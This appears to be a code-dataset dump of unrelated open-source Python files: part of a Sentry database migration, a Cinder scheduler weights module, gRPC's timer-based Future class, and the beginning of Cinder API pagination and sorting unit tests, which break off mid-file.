'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
u'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': u"orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': u"orm['sentry.User']"})
},
u'sentry.groupcountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'GroupCountByMinute', 'db_table': "'sentry_messagecountbyminute'"},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
u'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'db_index': 'False'})
},
u'sentry.grouptag': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTag', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'unique': 'True'})
},
u'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
u'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': u"orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']", 'null': 'True'})
},
u'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': u"orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': u"orm['sentry.User']"})
},
u'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
u'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
u'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': u"orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': u"orm['sentry.TeamMember']", 'to': u"orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
u'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': u"orm['sentry.User']"})
},
u'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
zenefits/sentry
|
src/sentry/south_migrations/0104_auto__add_groupseen__add_unique_groupseen_group_user.py
|
Python
|
bsd-3-clause
| 28,081 | 0.008048 |
# Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler host weights
"""
from cinder.openstack.common.scheduler import weight
class WeighedHost(weight.WeighedObject):
def to_dict(self):
return {
'weight': self.weight,
'host': self.obj.host,
}
def __repr__(self):
return ("WeighedHost [host: %s, weight: %s]" %
(self.obj.host, self.weight))
class BaseHostWeigher(weight.BaseWeigher):
"""Base class for host weights."""
pass
class HostWeightHandler(weight.BaseWeightHandler):
object_class = WeighedHost
def __init__(self, namespace):
super(HostWeightHandler, self).__init__(BaseHostWeigher, namespace)
|
rickerc/cinder_audit
|
cinder/openstack/common/scheduler/weights/__init__.py
|
Python
|
apache-2.0
| 1,305 | 0 |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Affords a Future implementation based on Python's threading.Timer."""
import sys
import threading
import time
from grpc.framework.foundation import future
class TimerFuture(future.Future):
"""A Future implementation based around Timer objects."""
def __init__(self, compute_time, computation):
"""Constructor.
Args:
compute_time: The time after which to begin this future's computation.
computation: The computation to be performed within this Future.
"""
self._lock = threading.Lock()
self._compute_time = compute_time
self._computation = computation
self._timer = None
self._computing = False
self._computed = False
self._cancelled = False
self._result = None
self._exception = None
self._traceback = None
self._waiting = []
def _compute(self):
"""Performs the computation embedded in this Future.
Or doesn't, if the time to perform it has not yet arrived.
"""
with self._lock:
time_remaining = self._compute_time - time.time()
if 0 < time_remaining:
self._timer = threading.Timer(time_remaining, self._compute)
self._timer.start()
return
else:
self._computing = True
try:
return_value = self._computation()
exception = None
traceback = None
except Exception as e: # pylint: disable=broad-except
return_value = None
exception = e
traceback = sys.exc_info()[2]
with self._lock:
self._computing = False
self._computed = True
self._return_value = return_value
self._exception = exception
self._traceback = traceback
waiting = self._waiting
for callback in waiting:
callback(self)
def start(self):
"""Starts this Future.
This must be called exactly once, immediately after construction.
"""
with self._lock:
self._timer = threading.Timer(
self._compute_time - time.time(), self._compute)
self._timer.start()
def cancel(self):
"""See future.Future.cancel for specification."""
with self._lock:
if self._computing or self._computed:
return False
elif self._cancelled:
return True
else:
self._timer.cancel()
self._cancelled = True
waiting = self._waiting
for callback in waiting:
try:
callback(self)
except Exception: # pylint: disable=broad-except
pass
return True
def cancelled(self):
"""See future.Future.cancelled for specification."""
with self._lock:
return self._cancelled
def running(self):
"""See future.Future.running for specification."""
with self._lock:
return not self._computed and not self._cancelled
def done(self):
"""See future.Future.done for specification."""
with self._lock:
return self._computed or self._cancelled
def result(self, timeout=None):
"""See future.Future.result for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
else:
raise future.TimeoutError()
def exception(self, timeout=None):
"""See future.Future.exception for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
else:
raise future.TimeoutError()
def traceback(self, timeout=None):
"""See future.Future.traceback for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
else:
raise future.TimeoutError()
def add_done_callback(self, fn):
"""See future.Future.add_done_callback for specification."""
with self._lock:
if not self._computed and not self._cancelled:
self._waiting.append(fn)
return
fn(self)
|
kidaa/kythe
|
third_party/grpc/src/python/src/grpc/framework/foundation/_timer_future.py
|
Python
|
apache-2.0
| 6,903 | 0.01101 |
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
from cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual(common.limited(self.tiny, req), [])
self.assertEqual(common.limited(self.small, req), self.small[10:])
self.assertEqual(common.limited(self.medium, req), self.medium[10:])
self.assertEqual(common.limited(self.large, req), self.large[10:1010])
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium[:10])
self.assertEqual(common.limited(self.large, req), self.large[:10])
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(common.limited(items, req), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req), [])
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req, max_limit=2000), [])
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
self.assertEqual({}, common.get_pagination_params(req))
def test_valid_marker(self):
"""Test valid marker param."""
req = webob.Request.blank(
'/?marker=263abb28-1de6-412f-b00b-f0ee0c4333c2')
self.assertEqual({'marker': '263abb28-1de6-412f-b00b-f0ee0c4333c2'},
common.get_pagination_params(req))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
self.assertEqual({'limit': 10}, common.get_pagination_params(req))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_valid_limit_and_marker(self):
"""Test valid limit and marker parameters."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?limit=20&marker=%s' % marker)
self.assertEqual({'marker': marker, 'limit': 20},
common.get_pagination_params(req))
class SortParamUtilsTest(test.TestCase):
def test_get_sort_params_defaults(self):
"""Verifies the default sort key and direction."""
sort_keys, sort_dirs = common.get_sort_params({})
self.assertEqual(['created_at'], sort_keys)
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_override_defaults(self):
"""Verifies that the defaults can be overriden."""
sort_keys, sort_dirs = common.get_sort_params({}, default_key='key1',
default_dir='dir1')
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_sort_param(self):
"""Verifies a single sort key and direction."""
params = {'sort': 'key1:dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_old_params(self):
"""Verifies a single sort key and direction."""
params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_with_default_sort_param(self):
"""Verifies a single sort value with a default direction."""
params = {'sort': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_single_with_default_old_params(self):
"""Verifies a single sort value with a default direction."""
params = {'sort_key': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_multiple_values(self):
"""Verifies multiple sort parameter values."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_not_all_dirs(self):
"""Verifies multiple sort keys without all directions."""
params = {'sort': 'key1:dir1,key2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
# Second key is missing the direction, should be defaulted
self.assertEqual(['dir1', 'desc', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_override_default_dir(self):
"""Verifies multiple sort keys and overriding default direction."""
params = {'sort': 'key1:dir1,key2,key3'}
sort_keys, sort_dirs = common.get_sort_params(params,
default_dir='foo')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'foo', 'foo'], sort_dirs)
def test_get_sort_params_params_modified(self):
"""Verifies that the input sort parameter are modified."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
common.get_sort_params(params)
self.assertEqual({}, params)
params = {'sort_dir': 'key1', 'sort_dir': 'dir1'}
common.get_sort_params(params)
self.assertEqual({}, params)
def test_get_sort_params_random_spaces(self):
"""Verifies that leading and trailing spaces are removed."""
params = {'sort': ' key1 : dir1,key2: dir2 , key3 '}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'desc'], sort_dirs)
def test_get_params_mix_sort_and_old_params(self):
"""An exception is raised if both types of sorting params are given."""
for params in ({'sort': 'k1', 'sort_key': 'k1'},
{'sort': 'k1', 'sort_dir': 'd1'},
{'sort': 'k1', 'sort_key': 'k1', 'sort_dir': 'd2'}):
self.assertRaises(webob.exc.HTTPBadRequest,
common.get_sort_params,
params)
class MiscFunctionsTest(test.TestCase):
def test_remove_major_version_from_href(self):
fixture = 'http://www.testsite.com/v1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href(self):
